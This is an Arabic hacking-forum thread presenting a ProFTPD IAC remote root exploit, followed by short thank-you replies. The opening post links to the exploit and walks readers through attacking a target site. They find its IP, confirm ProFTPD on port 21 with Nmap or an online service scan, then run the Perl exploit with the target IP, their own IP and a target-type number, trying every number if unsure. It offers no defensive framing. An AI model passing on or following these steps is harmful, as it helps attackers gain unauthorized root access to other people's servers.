الوسوم:
حالة الموضوع:
مغلق
  1. GhoosT

    GhoosT Developer

    الأنتساب:
    ‏7 سبتمبر 2011
    المشاركات:
    55
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الوظيفة:
    مهندس معماري + تاجر
    الإقامة:
    c:// algeria/ el oued
    السلام عليكم ورحمة الله وبركاته

    ثغرة جديدة للحصول على صلاحيات الروت عن بعد

    [​IMG]

    رابط الثغره

    http://www.exploit-db.com/exploits/15449/

    شرح بسيط لطريقة الثغرة

    اولا تستخرج IP الموقع باي طريقة كانت

    بعد كذا كيف تعرف البرنامج المصاب اذا مركب على السيرفر او لا ؟؟

    عندك طريقتين الاولى هي استخدام اداة Nmap وفحص برامج السيرفر عن طريق الميتا وهذى لها شروحات كثير ...

    الثانية استخدام موقع http://centralops.net/co/DomainDossier.aspx

    ضع الاي بي واختر service scan

    راح يطلع لك منفذ 21 الي هو وللمعلومية البرنامج هو برنامج FTP يعتمد على المنفذ 21

    بعد كذا طريقة الاستغلال كالتالي

    perl sad.pl ipserver yourip number

    sad.pl =اسم الملف الي يحتوي على الثغرة
    ipserver = اي بي السيرفر المستهدف

    yourip = الاي بي حقك

    number = تختار ارقام من 1 الى 12

    لو شغلت الملف بالطريقة هذى perl sad.pl

    راح تطلع لك الارقام امامك تختار المناسب منها حسب نو ع النظام للسيرفر المستهدف

    او ريح راسك وجربها كلها

    شرح فيديو
    [YOUTUBE]NrUnsC72w3I&feature=player_embedded[/YOUTUBE]
     
  2. الآلوسي

    الآلوسي V • I • P

    الأنتساب:
    ‏7 سبتمبر 2011
    المشاركات:
    61
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ProFTPD IAC Remote Root Exploit

    مشكور يابطل !

    شرح رائع تسلم يمناك
     
  3. ايمن

    ايمن Developer

    الأنتساب:
    ‏5 نوفمبر 2011
    المشاركات:
    23
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ProFTPD IAC Remote Root Exploit

    السلام عليكم ورحمه الله وبركاته
    مشكور علي المجهود الكبير دا ياغالي
     
  4. ряоfеѕѕіопаL

    ряоfеѕѕіопаL V • I • P

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    115
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    مدريد
    رد: ProFTPD IAC Remote Root Exploit

    يعطيك العآفيــه
    )5:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة